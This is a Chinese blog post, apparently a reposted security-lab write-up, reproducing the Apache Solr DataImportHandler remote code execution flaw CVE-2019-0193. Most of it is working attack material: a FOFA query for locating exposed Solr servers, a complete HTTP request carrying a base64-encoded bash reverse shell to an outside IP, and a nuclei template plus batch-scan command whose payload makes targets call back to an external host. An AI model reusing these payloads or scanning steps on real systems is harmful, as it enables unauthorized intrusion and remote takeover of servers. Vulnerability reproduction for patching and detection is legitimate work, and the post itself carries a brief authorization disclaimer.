漏洞复现 CVE-2019-0193 solr RCE

admin
admin
admin
101089
文章
87
评论
2022年6月21日10:36:38评论286 views字数 4483阅读14分56秒阅读模式

0x01 漏洞描述

   ApacheSolr是一个功能强大的开源搜索服务器,它支持REST风格APIApache Solr如果启用了DataImportHandler模块,因为它支持使用web请求来指定配置信息"DIH配置" ,攻击者可构造HTTP请求指定dataConfig参数的值(dataConfig内容),dataConfig内容完全可控(多种利用方式),后端处理的过程中,可导致命令执行。

漏洞复现 CVE-2019-0193 solr RCE

0x02 漏洞复现

洞影响: Apache Solr < 8.2.0

FOFA:app="APACHE-Solr"

1./solr/admin/cores查看Core的名称

http://x.x.x.x:8983/solr/admin/cores

漏洞复现 CVE-2019-0193 solr RCE


2.反弹shell,nc监听得到一个shell,bash脚本需要经过base加密解密和url特殊字符编码,网址如下:

https://ir0ny.top/pentest/reverse-encoder-shell.html

http://www.ab173.com/enc/urlencode.php

POST /solr/test/dataimport?indent=on&wt=json HTTP/1.1Host: x.x.x.x:8983User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 785Origin: http://x.x.x.x:8983Connection: closeReferer: http://x.x.x.x:8983/solr/Cookie: JSESSIONID=189B4C0C2DD2FAA46730AB6F93F07A5C; AuthSession=dnVsaHViOjYxNjU0RDU0OuuRUpB6L4bS_rEsM06eIp94lu1K; ADMINCONSOLESESSION=RDQnhK7ZvvJvYZ971L8pbqHlFY8Ty7Hr2v3yLPgJsJtYL2jpSVTS!1280347726
command=full-import&verbose=false&clean=true&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcyLzc3NzcgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport#备注:exec(%22命令%22))

漏洞复现 CVE-2019-0193 solr RCE


3.nuclei漏洞脚本如下(nuclei稳定快,编写poc简单,有社区维护,推荐使用)

nuclei下载地址:https://github.com/projectdiscovery/nuclei

批量验证命令:nuclei.exe -l subs.txt -t cves/2019/CVE-2019-0193.yaml
yaml POC:id: CVE-2019-0193
info:  name: Apache Solr - DataImportHandler RCE  author: pdteam  severity: high  description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.  reference:    - https://nvd.nist.gov/vuln/detail/CVE-2019-0193    - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193    - https://paper.seebug.org/1009/    - https://issues.apache.org/jira/browse/SOLR-13669  classification:    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H    cvss-score: 7.2    cve-id: CVE-2019-0193    cwe-id: CWE-94  tags: cve,cve2019,apache,rce,solr,oast,cisa
requests:  - raw:      - |        GET /solr/admin/cores?wt=json HTTP/1.1        Host: {{Hostname}}        Accept-Language: en        Connection: close
      - |        POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1        Host: {{Hostname}}        Content-type: application/x-www-form-urlencoded        X-Requested-With: XMLHttpRequest
        command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
    extractors:      - type: regex        internal: true        name: core        group: 1        regex:          - '"name":"(.*?)"'
    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol  # Confirms the HTTP Interaction        words:          - "http"
      - type: status        status:          - 200

漏洞复现 CVE-2019-0193 solr RCE

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog



原文始发于微信公众号(融云攻防实验室):漏洞复现 CVE-2019-0193 solr RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月21日10:36:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 CVE-2019-0193 solr RCEhttp://cn-sec.com/archives/1129549.html

发表评论

匿名网友 填写信息